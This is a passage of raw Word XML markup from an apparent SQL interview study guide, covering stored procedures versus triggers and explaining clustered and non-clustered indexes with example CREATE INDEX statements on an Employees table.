          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Provide more control over execution and can be called at any time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4D12E3" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Triggers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Automatically executed in response to specific events, providing less control over when they run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A57963C" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B179207" w14:textId="5D2B205C" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc178383305"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain the differences between clustered and non-clustered indexes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w14:paraId="420AA82A"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Indexes are crucial for optimizing database query performance by providing a fast way to look up data. In relational databases, indexes can be categorized into </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>clustered</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>non-clustered</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> indexes. Understanding their differences, uses, and implications is important for efficient database design and querying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE2296D" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Clustered Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585C1017"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 clustered index determines the physical order of data rows in a table. The table's data is stored on disk in the same order as the clustered index. Each table can have only one clustered index because the data rows themselves can only be sorted in one way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE225DC"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Characteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D34B28" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Physical Order</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The table's data is physically sorted and stored according to the clustered index's key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F6F607" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Primary Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: By default, the primary key of a table is created as a clustered index, but a clustered index can be created on any column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154942BD" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ideal for range queries and queries that return a large result set because it reduces the number of I/O operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3691F81F" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Uniqueness</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Automatically enforces uniqueness for the indexed columns if the index is defined as unique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E87E3A"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Consider a table Employees with columns EmployeeID, Name, and Salary. If a clustered index is created on EmployeeID, the table’s data will be stored in the order of EmployeeID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043A7BCB" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5"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CLUSTERED INDEX idx_EmployeeID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ABD26B" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5"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ON Employees (EmployeeID);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B42B23"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Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE7B682" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fast retrieval of data when querying by the indexed column(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A515612" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Efficient for range queries (e.g., finding all employees with IDs between 1000 and 2000).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5FB6E5"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Disadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF85E8A" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Only one clustered index per table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F849C" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Inserting, updating, or deleting rows may be slower because data needs to be physically reordered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9F4284" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-Clustered Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC7A6BC"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 non-clustered index is a separate structure from the table that contains a sorted list of values and pointers to the corresponding rows in the table. The data rows are not stored in the same order as the non-clustered index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2554398A"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Characteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B30224D" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Logical Order</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The index contains a sorted list of keys and pointers to the actual data rows, but it does not affect the physical order of data in the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A09C2B" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Multiple Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A table can have multiple non-clustered indexes, each providing different ways to access data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C94004D" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Useful for queries that involve columns not covered by the clustered index, or for improving performance on queries with specific filter criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DC6C5B"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Consider the same Employees table. If a non-clustered index is created on Salary, the index will store the Salary values in sorted order along with pointers to the corresponding rows in the Employees table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E165C8" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5"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NONCLUSTERED INDEX idx_Salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A6393" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5"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ON Employees (Salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9AE7E8"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Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BF592A" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Multiple non-clustered indexes can be created on a table, allowing for efficient querying on different columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CC8EB3" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Improves performance for queries involving columns that are not part of the clustered index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8B5F30" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Disadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CF9F6F" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Can increase storage requirements because of the additional index structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26244DDA" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-clustered indexes may require maintenance overhead during insert, update, or delete operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB6695" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2B396B" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Physical vs. Logical Ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7446AF29" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Clustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
